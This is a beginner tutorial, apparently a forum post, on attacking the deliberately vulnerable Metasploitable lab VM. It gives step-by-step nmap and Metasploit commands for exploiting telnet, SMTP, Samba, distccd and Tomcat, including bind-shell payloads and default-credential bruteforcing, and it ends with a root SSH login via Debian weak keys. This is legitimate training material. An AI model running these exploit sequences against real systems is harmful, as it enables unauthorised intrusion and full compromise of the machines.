*************
0x00 Overview
*************
Today I'll be writing a guide on how to exploit Metasploitable with the Metasploit Framework. Who is this tutorial for? This tutorial is for anyone who is interested in beginning a journey as a Penetration Tester. This tutorial will encompass
- A nice overview on how to use the Metasploit Framework by searching, and using some Modules and launching Exploits.
- It will show you how to Scan, and Exploit running services against a target using the MSF.
- It will show you how to use 1 public exploit later explained.
This VM im booting is specifically designed to be exploited with Metasploit. But I will be using on public exploit from
http://www.exploit-db.com/ that I have used personally in the past.
Victims IP Address: 192.168.1.6
Attacker's IP Address: 192.168.1.10NOTE: BT4-R2 is what I will be using to Exploit the VM. BT-4 Final does not yield the same results, so keep that in mind. Without further ado, lets begin…
***************
0x01 Enumeration
***************The most important part of any Penetration Test is Enumeration, the information you gather will be the information you will use to plan an attack against your target.
- First lets start off with a simple Nmap Scan to reveal the open ports and running services of our target.
As Pen-Testers, we need to understand what these services do and also we need to familiarize ourselves with common running services for future Audits.
Some common services include, but are not limited to:
- FTP
- Telnet
- SSH
- IMAP
- POP3
- MySQL
These running services can be Daemonized and continuously show up all the majority of all targets.
Sometimes
Nmap Scans will not show EVERY open port, therefore, I also ran
Nessusagainst our target to catch what Nmap did not.
NOTE: Operating System Identification is essential for the payloads and some exploits that we will be launching. This VM is NOT windows, therefore, we need to use *nix Payloads instead of Windows Payloads if we want to get a session when the exploit succeeds.
To scan the
Running Services on the Metasploitable Machine (192.168.1.6), ill be doing a SYN Stealth Scan to identify the services:
nmap -sS -sV 192.168.1.6
Code:
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
***************************
0x02 Exploiting Running Services
***************************Based on the Nmap Scan, we can see that we have a couple Running Services.
----------------------------------
Exploiting Telnet : Port 23
----------------------------------Lets being by exploiting
Telnet!
- Telnet provides an unencrypted channel between clients and the server. Attackers can take advantage of users using Telnet with ARP Cache Poisoning.
Now that we have a potentially vulnerable service, lets go to the
./msfconsole and search for the available exploits.
NOTE: Updating the Metasploit Framework will not be necessary for this video, if left un-updated, you will get the same results.
On the MSF console type
search telnetThe exploit that we will be using is
solaris/telnet/fuser. This is a
Telnet Remote Authentication Bypass exploit for Telnet. Now in order to use that exploit one will type:
use solaris/telnet/fuserNow we need to set the options for this exploit in order for it to work properly. To see the options you need to set you type:
show options. Now continue to set the specifications for this exploit.
set RHOST 192.168.1.6
set RPORT 23
set USER binThe default remote port is 23 and the default username to use is bin.
Now that we have everything set for the exploit, we need to choose a payload. The payload i will be using will be the
cmd/unix/bind_perl. But you can pick your own by typing
show payloads to see the other available payloads you can use for that exploit. To use that payload we type
set payload cmd/unix/bind_perlNow we need to set the requirements for the payload as well if its not done for you:
show options
set RHOST 192.168.1.6Now that we have everything set, for both exploit and payload, our next step is just to simple call exploit to launch it. Typing
exploit, will launch the exploit and as you can see, it was successful!
--------------------------------------------
Exploiting Postfix SMTPd : Port 25
--------------------------------------------Lets continue to exploit another running service, in this case,
SMTP.
- Without going in too much detail, the Postfiix SMTP server is used to receive mail from the network. It can be heavily spammed and can also be exposed to junk mail and viruses!
On the MSF console type
search smtp.
The exploit that we will be using is
unix/smtp/clamav_milter_blackhole. This is a
Remote Code Execution exploit for this SMTP. Now in order to use that exploit one will type:
use unix/smtp/clamav_milter_blackholeNow, just like before, we need to set the options for this exploit in order for it to work properly. Again, see the options you need to set you type: show options, and continue to set the specifications for this exploit.
set RHOST 192.168.1.6
set RPORT 25The default remote port is 25, but these are the only options we are interested in setting.
Now that we have everything set for the exploit, lets continue to choose a payload. The payload i will be using will be the
cmd/unix/bind_ruby. Be sure to specify that's the payload you will be utilizing by typing
set payload cmd/unix/bind_ruby. Once again,we need to set the requirements for the payload.
show options
set RHOST 192.168.1.6Now that everything is set, typing
exploit will launch the exploit successfully!
------------------------------------------------
Exploiting Samba SMBd 3.x : Port 139
------------------------------------------------The next service to be exploited lies on port 139.
- Understanding networks protocols is essential to Network Penetration testing. Samba is the product name but what we need to understand is what SMB is. Service Message Block is a protocol used for sharing files and printers between computers, that's what is for.
Lets search for samba exploits by typing
search samba.
The exploit that we will be using is
multi/samba/usermap_script. This exploit is used for Command Execution. Now in order to use that exploit one will type:
use multi/samba/usermap_scriptLets continue to set the exploit's requirements that we are interested in:
set RHOST 192.168.1.6
set RPORT 139The default remote port is 139. Now lets continue to choose our desired payload. The payload ill be using is
cmd/unix/bind_ruby. Lets continue to set the payload, set the options for the payload, and launch the exploit:
set payload cmd/unix/bind_ruby
show options
set RHOST 192.168.1.6
exploitExploit successful
--------------------------------------
Exploiting distccd : Port 3632
--------------------------------------Remember that Nessus Scan we did prior to exploitation? This is where we got this running service
Nmap did not pick up.
- Simply put, distcc is a program designed to distribute compiling tasks across a network to participating hosts.
The Nessus Scan Describes it as...
- Distcc is a program to distribute builds of C, C++, Objective C or Objective C++ code across several machines on a network. Distcc should always generate the same results as a local build, is simple to install and use, and is often two or more times faster than a local compile. Distcc by default trusts its clients completely that in turn could allow a malicious client to execute arbitrary commands on the server.
Lets search for anything related with this service by
typing search distccdThe exploit I'll be using for this service is the
unix/misc/distcc_exec. This is a
Daemon Command Execution exploit. Now lets repeat the previous steps all in one, including choosing the payload to save time.
use unix/misc/distcc_exec
show options
set RHOST 192.168.1.6
set RPORT 3632
set payload cmd/unix/bind_ruby
show options
set RHOST 192.168.1.6
exploitBy default, the port is 3632. But as you can see, the exploit succeeded.
---------------------------------------------------------------
Exploiting Apache Tomcat/Coyote JSP Engine 1.1
---------------------------------------------------------------I left
Apache for last because i had to use an Auxiliary to get the username and password and then and exploit to break into the VM.
First lets start with the Auxiliary Module by typing
search tomcatThe Auxiliary I'll be using is the
scanner/http/tomcat_mgr_login. This is to bruteforce the
Tomcat Application Manager Login. So to use this we type
use scanner/http/tomcat_mgr_login. Now the only options we need to set is the remote host and then launch the exploit:
set RHOSTS 192.168.1.6
exploitIf you scroll up on the green you can see that the credentials are set as
tomcat:tomcatwhich are defaults.
Now how can we use this to our advantage? We can either go to the Daemon and log into the manager or exploit it further and get a shell.
Once again we type search tomcat and found this exploit
multi/http/tomcat_mgr_deploy. This exploit is tomcat's
Application Manager Deployer Upload and Execute. Sounds good enough to test! Now lets use that exploit, set the specifications, choose a payload, set the requierments and launch the exploit
use multi/http/tomcat_mgr_deploy
show options
set RHOST 192.168.1.6
set RPORT 8180
set USERNAME tomcat
set PASSWORD tomcat
set payload generic/shell_bind_tcp
show options
set RHOST 192.168.1.6
exploitAs expected, we have a shell against the target.
----------------------------------
Launching a Public Exploit
----------------------------------Now lets do some snooping around. Based on the Nmap Scan, we know that the target uses
SSH so what we are interested to look for is the Authorized Keys. By default they are placed in the root.
Here is more information about
SSH Authorized Keys
- AuthorizedKeyFile specifies containing public key for public key authentication. It lists the public keys (RSA/DSA) that can be used for logging in as this user.
Lets go ahead and read this file by catting out the output:
cat /root/.ssh/authorized_keysAs you can see there is it. The exploit we are going to launch is located here:
http://www.exploit-db.com/exploits/5622/However, we are not going to be using the code. This system have week
SSH Keys. As described in the link of the exploit, there are a certain amount of possible SSH keys, so we can bruteforce them.
We can download these RSA Keys from here:
http://sugar.metasploit.com/debian_ssh_r...86.tar.bz2http://exploit-db.com/sploits/debian_ssh...86.tar.bz2Now on a new terminal, type tar jxvf to extract the Keys to the /root/ then type
cd /rsa/2048Back on the shell we have on MSF lets grab the entire key which will be:
AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkct eZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXl n/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ 5cCs4WocyVxsXovcNnbALTp3wWe need to find this on the Keys we extracted. Go on the terminal we type:
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkct eZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXl n/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ 5cCs4WocyVxsXovcNnbALTp3w *.pubto find the exact match and make it recursive. This will find the public RSA key that we will use to authenticate as root. This is the result you get.
57c3115d77c56390332dc5c49978627a-5429.pubAll those letters and numbers is the identity file for SSH. Now we simply just type:
ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.6 And we are in as root :)
***************
0x03 Final Words
***************Well this is the end of this tutorial. Overall, using Metasploitable is a great way to learn how to use Metasploit and some of its features. There are other lab environment that provide the same Penetration challenge but through different Methodologies.With that being said, Ill conclude this tutorial.
